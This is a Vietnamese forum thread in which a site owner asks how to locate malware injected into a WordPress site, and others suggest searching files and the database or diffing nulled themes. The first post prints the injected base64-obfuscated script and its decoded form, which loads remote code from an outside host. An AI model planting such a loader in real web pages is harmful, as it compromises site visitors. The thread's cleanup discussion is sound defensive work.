Hỏi - cách tìm ra mã độc keit.staticweb.tk/t6mcn1 của web sử dụng Wordpress

Discussion in 'Thảo Luận Chung' started by bumkom, Aug 23, 2017.

  1. bumkom

    bumkom Khách Qua Đường

    Tình hình là có 1 con web sử dụng wordpress, hiện giờ nó bị dính con virut này

    Mã khi viewsource
    <script src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCUzYSUyZiUyZiU2YiU2NSU2OSU3NCUyZSU3MyU3NCU2MSU3NCU2OSU2MyU3NyU2NSU2MiUyZSU3NCU2YiUyZiU3NCUzNiU2ZCU2MyU2ZSUzMSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZScpKTs="></script>

    Decode
    <script>document.write(unescape('%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6b%65%69%74%2e%73%74%61%74%69%63%77%65%62%2e%74%6b%2f%74%36%6d%63%6e%31%22%3e%3c%2f%73%63%72%69%70%74%3e'));</script>

    Decode phát nữa thì ra
    <script src="http://keit.staticweb.tk/t6mcn1"></script>

    Các bạn có cách nào check và tìm ra mã độc này không, mình ko thạo wp lắm lên mò mãi chưa ra
    chạy trên local thì ko thấy cái mã base64 đâu cả. trên hosting thì mới có
     
  2. Hoa Mãn Lâu

    Hoa Mãn Lâu Trưởng Môn

    Down hết source về, xong dùng notepad++ find in file toàn bộ folder code. Với keyword là base64 thử xem {amazed}
     
  3. gu gồ

    gu gồ Administrator Staff Member

    up code khác connect database chạy tiếp, đừng mất time nếu không có mục đích gì cao cả lắm ^^
     
    Nai likes this.
  4. bumkom

    bumkom Khách Qua Đường

    Mình thử rồi nhưng không tìm thấy nó {amazed}
     
  5. bumkom

    bumkom Khách Qua Đường

    À con web chính của thằng em nó nhờ chứ ko phải con auto {big_smile}
     
  6. Hoa Mãn Lâu

    Hoa Mãn Lâu Trưởng Môn

    Thím quăng code site lên đây ae check xem. Mà coi chừng nó nằm trong db nữa đấy. Nén DB quăng lên luôn đây đê
     
  7. Nai

    Nai MiddleMan Staff Member

    Để ý thấy từ ngày có forum Admin năng nổ ghê. {beauty}{beauty}{beauty}
     
  8. bumkom

    bumkom Khách Qua Đường

    Code của thằng em nó nhờ mới chit {angry}
     
  9. money

    money Hương Chủ

  10. Nam

    Nam Sơ Nhập Giang Hồ

    em thường hay vầy chia sẻ xem có bác nào giống em không.
    Các theme tải nulled trên mạng về, em tải 3-4 nguồn khác nhau. Rồi giải nén, dùng winmerge để compare.
    Sẽ lòi ra rất nhiều bác chèn code ngầm, code bậy bạ vào. Từ đó em remove ra. cho sạch
     
  11. bumkom

    bumkom Khách Qua Đường

    Mình thử cái này rồi nhưng ko tìm thấy, nó ko có plugin đấy ko biết nó dấu ở đâu wp thì ko thạo kể cũng mệt phết {amazed}
    thôi đành vậy
     
  12. Nai

    Nai MiddleMan Staff Member

    Code tay mà cũng cần nulled nữa hở bác. Mấy cái HTML nó cũng chèn nữa à {beat_plaster}
     
    Nam likes this.
  13. Nam

    Nam Sơ Nhập Giang Hồ

    Em đang nói mí cái theme, plugin của wordpress :D hihi . Em vẫn làm blog mà :))
     
    Nai likes this.